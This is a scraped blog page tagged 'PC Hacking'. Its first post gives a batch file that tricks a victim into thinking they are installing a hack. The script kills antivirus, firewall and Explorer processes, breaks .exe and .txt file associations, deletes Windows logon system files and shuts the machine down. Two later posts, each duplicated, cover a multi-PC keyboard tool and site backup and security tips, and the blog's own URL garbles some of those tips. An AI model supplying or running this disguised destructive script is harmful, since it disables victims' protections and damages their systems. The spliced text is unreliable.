Showing posts with label PC Hacking. Show all posts
Showing posts with label PC Hacking. Show all posts

Friday, September 17, 2010

Fool Someone into thinking that he is installing a hack

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Hack will:
1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

Code is
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls



msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

WARNING
Please Do NOT Try This Yourself!
I will NOT Be Held Responsible for this!

Wednesday, September 8, 2010

How To Control Multiple PCs with One Mouse & Keyboard?


Controling Multiple PCs with One Mouse & Keyboard


If you work on multiple PCs simultaneously and have a lot of things going on at once then this post is specifically for you ;)Multiple keyboards do cover a lot of space on our desks and create a hell lot of fuss. With this software you can have a single keyboard and mouse and choose which system you want to access! All this is done over a network connection. The software also caters security essentials to keep this system secure over a network. The installation process is very simple and easy, you can easily get started by placing the monitors side by side. This FREE software is ‘Input Director’ you can find extensive detail at http://www.inputdirector.com/ however some of the common features are listed below:
  • Control all PCs Simultaneously with just one set of keyboard and mouse.
  • Simultaneously lock all computers
  • Synchronise the screensavers across your computers
  • Synchronise shutdown of your system (or individually configure whether a computer goes to standby, hibernate or shuts down)
  • Synchronize wallpapers across all PC’s on the input grid.
  • A shared clipboard which allows you to copy data from one PC to paste it onto another PC in seconds. The clipboard can be accessed for cut, copy and paste actions from all PC’s on the grid.
A video demonstration of how it actually looks, once in action is given below (Watch in full screen to have a better view):
ou can download the software here and find it’s installation instructions here. Don’t forget to join us on facebook and twitter. If you like this post share it with your friends & if you have any issues feel free to comment.

How To Control Multiple PCs with One Mouse & Keyboard?


Controling Multiple PCs with One Mouse & Keyboard


If you work on multiple PCs simultaneously and have a lot of things going on at once then this post is specifically for you ;)Multiple keyboards do cover a lot of space on our desks and create a hell lot of fuss. With this software you can have a single keyboard and mouse and choose which system you want to access! All this is done over a network connection. The software also caters security essentials to keep this system secure over a network. The installation process is very simple and easy, you can easily get started by placing the monitors side by side. This FREE software is ‘Input Director’ you can find extensive detail at http://www.inputdirector.com/ however some of the common features are listed below:
  • Control all PCs Simultaneously with just one set of keyboard and mouse.
  • Simultaneously lock all computers
  • Synchronise the screensavers across your computers
  • Synchronise shutdown of your system (or individually configure whether a computer goes to standby, hibernate or shuts down)
  • Synchronize wallpapers across all PC’s on the input grid.
  • A shared clipboard which allows you to copy data from one PC to paste it onto another PC in seconds. The clipboard can be accessed for cut, copy and paste actions from all PC’s on the grid.
A video demonstration of how it actually looks, once in action is given below (Watch in full screen to have a better view):
ou can download the software here and find it’s installation instructions here. Don’t forget to join us on facebook and twitter. If you like this post share it with your friends & if you have any issues feel free to comment.

Sunday, August 8, 2010

Top 5 steps that will make hack diagnosis and cleanup easier

1) Always have a backup copy of your entire website and its databases
You can use FTP and/or cPanel > Backups. Keep the backup somewhere not on your server, such as on your local PC or a DVD. Even if your webhost does backups, make a separate set for yourself. Do a new backup whenever there is enough new content that you don't want to have to redo the work. Keep more than one "generation" of backups. For example, if you backup monthly, keep separate versions from 1 month ago and from 2 months ago. This guards against backing up your site after it's been infected but before you discovered it. You'll still have (hopefully) a slightly older backup that isn't infected. For the same reason, don't backup too often.


2) Turn on log archiving in cPanel now
Your raw HTTP and FTP logs are an important source of information after an attack, but the logs are normally deleted each day. www.hackerzone09.blogspot.com to allow them to accumulate and preserve the evidence after an attack. Periodically download and review the logs to see what kinds of attacks are being launched against your site. As is so often the case, becoming familiar with what is normal will help you detect when something is not. Accumulated logs can take a lot of disk space, so you might want to delete old ones from the server periodically.


3) Get a complete list of your site files NOW while they are known-good
This article describes how to get a list of all the files in your website. If you do it now, it will be a baseline list of the files you can assume are supposed to be there. If your site gets damaged, the list will help you decide whether a file you don't recognize is new or is just a system file that you never noticed before.


4) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager or the complete file list you made. If you get used to what is normal, things that aren't will catch your attention.


5) Use good database connection practices in scripts:
a) Create separate MySQL users for your scripts to use
If you use your cPanel userID and password for database connections in your scripts, then changing your cPanel password will instantly break all your scripts until you recode them to use the new password.
Instead, create one or more new users, completely unrelated to your cPanel login, that your scripts can use for their database connections:
1.  Go to cPanel > MySQL® Databases > Current Users.
2.  In Username: enter the name of the user to create. Although the existing user names might appear as YourUserID_username, don't enter the prefix and underscore. cPanel will do that for you, if needed.
3.  In Password: enter the password to use. Make it a strong one.
4.  Click Create User, read the confirmation screen, and then Go Back to the MySQL Account Maintenance page.
5.  Go to the Add Users To Your Databases section.
6.  In the left dropdown box, select the user you just created.
7.  In the right dropdown box, select the database you want that user to be able to connect to.
8.  Select the Privileges you want that user to have for that database, by checking the appropriate boxes. Select only the privileges the user really needs for performing whatever tasks your scripts will do. Granting only limited privileges is a security precaution.
9.  Click Add User To Database. Your new user now has the specified privileges, for that database only. Add the user to other databases, if needed.


Now update your scripts so they use the connection data for this new user instead of your old cPanel user. However, ...
b) Put your MySQL connection data in a well protected file
If each of your scripts has its own code block for database connection, then if you are hacked and have to change your passwords, you'll have to hunt through all your files to find every code block that needs changing.
Instead, put all your database connection code in one central location such as an include file that is well-protected from web access, and make all your scripts read it from there. There are examples and some discussion about how to do this in the User Contributed Notes at www.hackerzone09.blogspot.com. You can protect your include file by putting it in a folder above public_html, or in any folder that is closed to web access by an .htaccess file, or by the other methods mentioned in the php.net Notes.
Unfortunately, none of these protection methods will keep your data safe from someone who has actually gotten into your site, but the new database connection method you have just created will make it easy to change your password (in just one place) if that does happen.

Top 5 steps that will make hack diagnosis and cleanup easier

1) Always have a backup copy of your entire website and its databases
You can use FTP and/or cPanel > Backups. Keep the backup somewhere not on your server, such as on your local PC or a DVD. Even if your webhost does backups, make a separate set for yourself. Do a new backup whenever there is enough new content that you don't want to have to redo the work. Keep more than one "generation" of backups. For example, if you backup monthly, keep separate versions from 1 month ago and from 2 months ago. This guards against backing up your site after it's been infected but before you discovered it. You'll still have (hopefully) a slightly older backup that isn't infected. For the same reason, don't backup too often.


2) Turn on log archiving in cPanel now
Your raw HTTP and FTP logs are an important source of information after an attack, but the logs are normally deleted each day. www.hackerzone09.blogspot.com to allow them to accumulate and preserve the evidence after an attack. Periodically download and review the logs to see what kinds of attacks are being launched against your site. As is so often the case, becoming familiar with what is normal will help you detect when something is not. Accumulated logs can take a lot of disk space, so you might want to delete old ones from the server periodically.


3) Get a complete list of your site files NOW while they are known-good
This article describes how to get a list of all the files in your website. If you do it now, it will be a baseline list of the files you can assume are supposed to be there. If your site gets damaged, the list will help you decide whether a file you don't recognize is new or is just a system file that you never noticed before.


4) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager or the complete file list you made. If you get used to what is normal, things that aren't will catch your attention.


5) Use good database connection practices in scripts:
a) Create separate MySQL users for your scripts to use
If you use your cPanel userID and password for database connections in your scripts, then changing your cPanel password will instantly break all your scripts until you recode them to use the new password.
Instead, create one or more new users, completely unrelated to your cPanel login, that your scripts can use for their database connections:
1.  Go to cPanel > MySQL® Databases > Current Users.
2.  In Username: enter the name of the user to create. Although the existing user names might appear as YourUserID_username, don't enter the prefix and underscore. cPanel will do that for you, if needed.
3.  In Password: enter the password to use. Make it a strong one.
4.  Click Create User, read the confirmation screen, and then Go Back to the MySQL Account Maintenance page.
5.  Go to the Add Users To Your Databases section.
6.  In the left dropdown box, select the user you just created.
7.  In the right dropdown box, select the database you want that user to be able to connect to.
8.  Select the Privileges you want that user to have for that database, by checking the appropriate boxes. Select only the privileges the user really needs for performing whatever tasks your scripts will do. Granting only limited privileges is a security precaution.
9.  Click Add User To Database. Your new user now has the specified privileges, for that database only. Add the user to other databases, if needed.


Now update your scripts so they use the connection data for this new user instead of your old cPanel user. However, ...
b) Put your MySQL connection data in a well protected file
If each of your scripts has its own code block for database connection, then if you are hacked and have to change your passwords, you'll have to hunt through all your files to find every code block that needs changing.
Instead, put all your database connection code in one central location such as an include file that is well-protected from web access, and make all your scripts read it from there. There are examples and some discussion about how to do this in the User Contributed Notes at www.hackerzone09.blogspot.com. You can protect your include file by putting it in a folder above public_html, or in any folder that is closed to web access by an .htaccess file, or by the other methods mentioned in the php.net Notes.
Unfortunately, none of these protection methods will keep your data safe from someone who has actually gotten into your site, but the new database connection method you have just created will make it easy to change your password (in just one place) if that does happen.